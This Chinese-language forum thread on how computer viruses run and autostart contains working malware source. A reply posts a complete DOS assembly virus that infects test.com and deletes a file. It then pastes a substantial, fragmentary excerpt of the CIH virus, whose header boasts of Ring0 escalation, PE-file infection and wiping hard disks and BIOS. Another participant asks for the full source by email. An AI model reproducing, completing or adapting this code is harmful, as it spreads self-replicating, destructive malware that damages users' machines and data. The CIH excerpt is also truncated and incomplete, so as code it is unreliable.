请问病毒的运行方式是什么,
如新欢乐时光病毒(在d:\aaa目录中),资源管理器对其目录进行访问才会感染,
而用打开文件对话矿进行访问并不会感染,,别的病毒呢?
犹如黑客或木马程序,只有在注册表中的run 目录下添加启动项才可开机自动运行吗?
大家来讨论,高手请留通讯方式,多谢了!
如新欢乐时光病毒(在d:\aaa目录中),资源管理器对其目录进行访问才会感染,
而用打开文件对话矿进行访问并不会感染,,别的病毒呢?
犹如黑客或木马程序,只有在注册表中的run 目录下添加启动项才可开机自动运行吗?
大家来讨论,高手请留通讯方式,多谢了!
解决方案 »
- 在我写的dll,又使用了外部DLL,请问如何外部的DLL包到我写的那个dll中去?
- 如何求得控件数组的下标?
- 程序员有没有喜欢火影的,有的话就加群8214435
- 我用Delphi编程来读取OutLook的Email时,会出现OutLook的提示窗口,如何屏蔽掉这个窗口
- 请教问题!在线等!
- Delphi 的认证怎么考?
- 怎样将文件尾行新加的字符都取出来呀?
- listbox 内的数据?如何添加?修改??能给员马么?
- Delph中的Self对应BCB中是什么
- 关于dbgrid中文字变色。。。?
- 为什么twebBrowser 中的 GoBack 当没法后退的时候会出错,怎样避免?谢谢
- 前辈的两组代码,请较详细的解释每句的意思(除了var,begin,end等句)
而开机启动的方法多种多样,可不止添加启动项一种呦^^
WIN。INI
SYSTEM。INI
文件关联
;功能:感染当前文件夹的test.com文件
; 并删除当前文件夹的del.txt文件
; 显示预设的字符串
CSEG SEGMENT
ASSUME CS:CSEG,DS:CSEG,SS:CSEG
main PROC NEAR
mainstart:
CALL vstart ;病毒的代码开始处
vstart:
POP SI ;得到当前地址
MOV BP,SI ;保存当前地址
PUSH SI
MOV AH,9
ADD SI,OFFSET message-OFFSET vstart ;显示预设字符串
MOV DX,SI
INT 21h
POP SI
ADD SI,OFFSET yuan4byte-OFFSET vstart ;取得原程序中的前四个字节
MOV DI,100h ;目的地址
MOV AX,DS:[SI] ;开始复制
MOV DS:[DI],AX
INC SI
INC SI
INC DI
INC DI
MOV AX,DS:[SI]
MOV DS:[DI],AX
MOV SI,BP ;恢复地址值
MOV DX,OFFSET delname-OFFSET vstart
ADD DX,SI
MOV AH,41h
INT 21h
MOV DX,OFFSET filename-OFFSET vstart ;得到文件名
ADD DX,SI
MOV AL,02
MOV AH,3dh ;写文件
INT 21h
JC error
MOV BX,AX ;文件句柄
MOV DX,OFFSET yuan4byte-OFFSET vstart ;读文件的前四个字节
ADD DX,SI
MOV CX,4
MOV AH,3fh
INT 21h
MOV AX,4202h ;到文件尾
XOR CX,CX
XOR DX,DX
INT 21h
MOV DI,OFFSET new4byte-OFFSET vstart ;保存要跳的地方
ADD DI,2
ADD DI,SI
SUB AX,4
MOV DS:[DI],AX
ADD SI,OFFSET mainstart-OFFSET vstart ;准备写入病毒
MOV DX,SI
MOV vsizes,OFFSET vends-OFFSET mainstart
MOV CX,vsizes
MOV AH,40h
INT 21h
MOV SI,BP ;定位到文件头
MOV AL,0
XOR CX,CX
XOR DX,DX
MOV AH,42h
INT 21h
MOV AH,40h ;将新的文件头写入
MOV CX,4
MOV DX,OFFSET new4byte-OFFSET vstart
ADD DX,SI
INT 21h
MOV AH,3eh ;关闭文件
INT 21h
error:
MOV AX,100h
PUSH AX
RET
main ENDP
yuan4byte:
RET
DB 3 DUP (?)
vsizes DW 0
new4byte DB ‘M‘,0e9h,0,0
filename DB "test.com",0
delname DB "del.txt",0
message DB "He he he he!"
DB 0dh,0ah,"$"
vends:
start:
MOV AX,CSEG
MOV DS,AX
MOV SS,AX
CALL main
MOV AX,4c00h
INT 21h
CSEG ENDS
END start
以上就是一个简单的可以传染COM文件的程序代码, 也是想当初我所做的具有传染性质的第一个程序。如何???不难吧。
-------------------------------------------------------------------------------
COM文件执行时将COM文件内所的所有内容COPY到内存, 起始地址是100,然后进行执行
没有任何有关节啦、段啦这些属性,所以COM文件病毒是最简单最简单的病毒。
; ****************************************************************************
; * The Virus Program Information *
; ****************************************************************************
; * *
; * Designer : CIH Source : TTIT of TATUNG in Taiwan *
; * Create Date : 04/26/1998 Now Version : 1.4 *
; * Modification Time : 05/31/1998 *
; * *
; * Turbo Assembler Version 4.0 : tasm /m cih *
; * Turbo Link Version 3.01 : tlink /3 /t cih, cih.exe *
; * *
; *==========================================================================*
; * Modification History *
; *==========================================================================*
; * v1.0 1. Create the Virus Program. *
; * 2. The Virus Modifies IDT to Get Ring0 Privilege. *
; * 04/26/1998 3. Virus Code doesn't Reload into System. *
; * 4. Call IFSMgr_InstallFileSystemApiHook to Hook File System. *
; * 5. Modifies Entry Point of IFSMgr_InstallFileSystemApiHook. *
; * 6. When System Opens Existing PE File, the File will be *
; * Infected, and the File doesn't be Reinfected. *
; * 7. It is also Infected, even the File is Read-Only. *
; * 8. When the File is Infected, the Modification Date and Time *
; * of the File also don't be Changed. *
; * 9. When My Virus Uses IFSMgr_Ring0_FileIO, it will not Call *
; * Previous FileSystemApiHook, it will Call the Function *
; * that the IFS Manager Would Normally Call to Implement *
; * this Particular I/O Request. *
; * 10. The Virus Size is only 656 Bytes. *
; *==========================================================================*
; * v1.1 1. Especially, the File that be Infected will not Increase *
; * it's Size... ^__^ *
; * 05/15/1998 2. Hook and Modify Structured Exception Handing. *
; * When Exception Error Occurs, Our OS System should be in *
; * Windows NT. So My Cute Virus will not Continue to Run, *
; * it will Jmup to Original Application to Run. *
; * 3. Use Better Algorithm, Reduce Virus Code Size. *
; * 4. The Virus "Basic" Size is only 796 Bytes. *
; *==========================================================================*
; * v1.2 1. Kill All HardDisk, and BIOS... Super... Killer... *
; * 2. Modify the Bug of v1.1 *
; * 05/21/1998 3. The Virus "Basic" Size is 1003 Bytes. *
; *==========================================================================*
; * v1.3 1. Modify the Bug that WinZip Self-Extractor Occurs Error. *
; * So When Open WinZip Self-Extractor ==> Don't Infect it. *
; * 05/24/1998 2. The Virus "Basic" Size is 1010 Bytes. *
; *==========================================================================*
; * v1.4 1. Full Modify the Bug : WinZip Self-Extractor Occurs Error. *
; * 2. Change the Date of Killing Computers. *
; * 05/31/1998 3. Modify Virus Version Copyright. *
; * 4. The Virus "Basic" Size is 1019 Bytes. *
; ****************************************************************************
.586P
; ****************************************************************************
; * Original PE Executable File(Don't Modify this Section) *
; ****************************************************************************
OriginalAppEXE SEGMENT
FileHeader:
db 04dh, 05ah, 090h, 000h, 003h, 000h, 000h, 000h
db 004h, 000h, 000h, 000h, 0ffh, 0ffh, 000h, 000h
db 0b8h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 040h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 080h, 000h, 000h, 000h
db 00eh, 01fh, 0bah, 00eh, 000h, 0b4h, 009h, 0cdh
db 021h, 0b8h, 001h, 04ch, 0cdh, 021h, 054h, 068h
db 069h, 073h, 020h, 070h, 072h, 06fh, 067h, 072h
db 061h, 06dh, 020h, 063h, 061h, 06eh, 06eh, 06fh
db 074h, 020h, 062h, 065h, 020h, 072h, 075h, 06eh
db 020h, 069h, 06eh, 020h, 044h, 04fh, 053h, 020h
db 06dh, 06fh, 064h, 065h, 02eh, 00dh, 00dh, 00ah
db 024h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 050h, 045h, 000h, 000h, 04ch, 001h, 001h, 000h
db 0f1h, 068h, 020h, 035h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 0e0h, 000h, 00fh, 001h
db 00bh, 001h, 005h, 000h, 000h, 010h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 010h, 010h, 000h, 000h, 000h, 010h, 000h, 000h
db 000h, 020h, 000h, 000h, 000h, 000h, 040h, 000h
db 000h, 010h, 000h, 000h, 000h, 002h, 000h, 000h
db 004h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 004h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 020h, 000h, 000h, 000h, 002h, 000h, 000h
db 000h, 000h, 000h, 000h, 002h, 000h, 000h, 000h
db 000h, 000h, 010h, 000h, 000h, 010h, 000h, 000h
db 000h, 000h, 010h, 000h, 000h, 010h, 000h, 000h
db 000h, 000h, 000h, 000h, 010h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 0c3h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
dd 00000000h, VirusSize
lea ecx, StopToRunVirusCode-@0[ebx]
push ecx
push eax
; *************************************
; * Let's Modify *
; * IDT(Interrupt Descriptor Table) *
; * to Get Ring0 Privilege... *
; *************************************
push eax ;
sidt [esp-02h] ; Get IDT Base Address
pop ebx ;
add ebx, HookExceptionNumber*08h+04h ; ZF = 0
cli
mov ebp, [ebx] ; Get Exception Base
mov bp, [ebx-04h] ; Entry Point
lea esi, MyExceptionHook-@1[ecx]
push esi
mov [ebx-04h], si ;
shr esi, 16 ; Modify Exception
mov [ebx+02h], si ; Entry Point Address
pop esi
; *************************************
; * Generate Exception to Get Ring0 *
; *************************************
int HookExceptionNumber ; GenerateException
ReturnAddressOfEndException = $
; *************************************
; * Merge All Virus Code Section *
; *************************************
; *************************************
; * Generate Exception Again *
; *************************************
int HookExceptionNumber ; GenerateException Aga
; *************************************
; * Let's Restore *
; * Structured Exception Handing *
; *************************************
ReadyRestoreSE:
sti
xor ebx, ebx
jmp RestoreSE
; *************************************
; * When Exception Error Occurs, *
; * Our OS System should be in NT. *
; * So My Cute Virus will not *
; * Continue to Run, it Jmups to *
; * Original Application to Run. *
; *************************************
StopToRunVirusCode:
@1 = StopToRunVirusCode
xor ebx, ebx
mov eax, fs:[ebx]
mov esp, [eax]
RestoreSE:
pop dword ptr fs:[ebx]
pop eax
; *************************************
; * Return Original App to Execute *
; *************************************
pop ebp
push 00401000h ; Push Original
OriginalAddressOfEntryPoint = $-4 ; App Entry Point to Stack
ret ; Return to Original App Entry Point
; *********************************************************
; * Ring0 Virus Game Initial Program *
; *********************************************************
MyExceptionHook:
@2 = MyExceptionHook
jz InstallMyFileSystemApiHook
; *************************************
; * Do My Virus Exist in System !? *
; *************************************
mov ecx, dr0
jecxz AllocateSystemMemoryPage
add dword ptr [esp], ReadyRestoreSE-ReturnAddressOf
dException
ASM等的看都麻烦/ by LY http://lysoft.7u7.net http://liuyang.7i24.com http://lysoft.91i.net
能不能,发给我一份 是源代码的
[email protected]
我一直是研究DOS下的病毒的~~因为学校的机子太老啊,没有办法~